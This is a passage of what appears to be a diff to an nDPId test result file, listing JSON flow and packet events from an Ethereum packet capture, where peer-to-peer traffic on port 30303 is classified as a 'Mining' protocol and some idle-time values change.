{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1578508365065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGx0OyPgrawKgBuHZf3UIGbP5HMVZ5eqAScSDZAAAAAgQFrAQCCAoLgra+ItiWHgEDAwc="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGu0vAqAG4sj4K2t1Cdl8xVnl6Bmz+SIAQECxokQAAAQEICiLYlkYLgra+"} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHKIQAAEAR+iHAqAG4QipS9nZfdl8As8h52l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1578508365074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGtGayPh23wKgBuHZf3UMO43zOltsrhKAScSBk2gAAAgQFrAQCCArDycEqItiWJgEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1578508365074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqG7AqAG4sj4dt91Ddl+W2yuEDuN8z4AQECz0awAAAQEICiLYlk3DycEq"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365079,"flow_last_seen":1578508365079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365079,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1578508365079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbbDAqAG4rGlePt1Gdl8dOmrnAAAAALAC\/\/\/VAwAAAgQFtAEDAwUBAQgKItiWUQAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1578508365092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365092,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGSEK524U+wKgBuHZf3UWdKkNsjzbHKaASbCBIRwAAAgQFdAQCCAp\/mc8NItiWMgEDAwc="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1578508365092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365092,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGOUrAqAG4uduFPt1Fdl+PNscpnSpDbYAQEAzSvAAAAQEICiLYll1\/mc8N"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365094,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365094,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGIHjAqAG4tqKhPd1Hdl8HffxGAAAAALAC\/\/8MGQAAAgQFtAEDAwUBAQgKItiWYAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1578508365104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365104,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGeqysaV4+wKgBuHZf3UajVVX7HTpq6KAS\/ojIGAAAAgQFrAQCCAobAQsKItiWUQEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1578508365104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365104,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGbbzAqAG4rGlePt1Gdl8dOmroo1VV\/IAQECzlIgAAAQEICiLYlmgbAQsK"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365153,"flow_last_seen":1578508365153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365153,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1578508365153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365153,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWefAqAG4I+T6jN1Kdl95PEStAAAAALAC\/\/+LMAAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365154,"flow_last_seen":1578508365154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365154,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1578508365154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365154,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4TfAqAG4iskMV91Ldl\/HR3E5AAAAALAC\/\/+X6AAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365169,"flow_last_seen":1578508365169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365169,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1578508365169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365169,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGP33AqAG4sAmI0d1Mdl8ouUvbAAAAALAC\/\/+6CgAAAgQFtAEDAwUBAQgKItiWngAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1578508365186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365186,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG7zuKyQxXwKgBuHZf3Uu6UG6Lx0dxOqAScSDP1QAAAgQFrAQCCAq1b4mgItiWjwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1578508365186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365186,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4UPAqAG4iskMV91Ldl\/HR3E6ulBujIAQECxfbwAAAQEICiLYlq61b4mg"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtk3AqAG4VdZsNN1Odl+\/h8KiAAAAALAC\/\/8jMQAAAgQFtAEDAwUBAQgKItiWsAAAAAAEAgAA"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1578508365074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGtGayPh23wKgBuHZf3UMO43zOltsrhKAScSBk2gAAAgQFrAQCCArDycEqItiWJgEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1578508365074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqG7AqAG4sj4dt91Ddl+W2yuEDuN8z4AQECz0awAAAQEICiLYlk3DycEq"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365079,"flow_last_seen":1578508365079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365079,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1578508365079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbbDAqAG4rGlePt1Gdl8dOmrnAAAAALAC\/\/\/VAwAAAgQFtAEDAwUBAQgKItiWUQAAAAAEAgAA"} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1578508365092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365092,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGSEK524U+wKgBuHZf3UWdKkNsjzbHKaASbCBIRwAAAgQFdAQCCAp\/mc8NItiWMgEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1578508365092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365092,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGOUrAqAG4uduFPt1Fdl+PNscpnSpDbYAQEAzSvAAAAQEICiLYll1\/mc8N"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365094,"flow_last_seen":1578508365094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1578508365094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365094,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGIHjAqAG4tqKhPd1Hdl8HffxGAAAAALAC\/\/8MGQAAAgQFtAEDAwUBAQgKItiWYAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1578508365104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365104,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGeqysaV4+wKgBuHZf3UajVVX7HTpq6KAS\/ojIGAAAAgQFrAQCCAobAQsKItiWUQEDAwc="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1578508365104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365104,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGbbzAqAG4rGlePt1Gdl8dOmroo1VV\/IAQECzlIgAAAQEICiLYlmgbAQsK"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365153,"flow_last_seen":1578508365153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365153,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1578508365153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365153,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWefAqAG4I+T6jN1Kdl95PEStAAAAALAC\/\/+LMAAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} 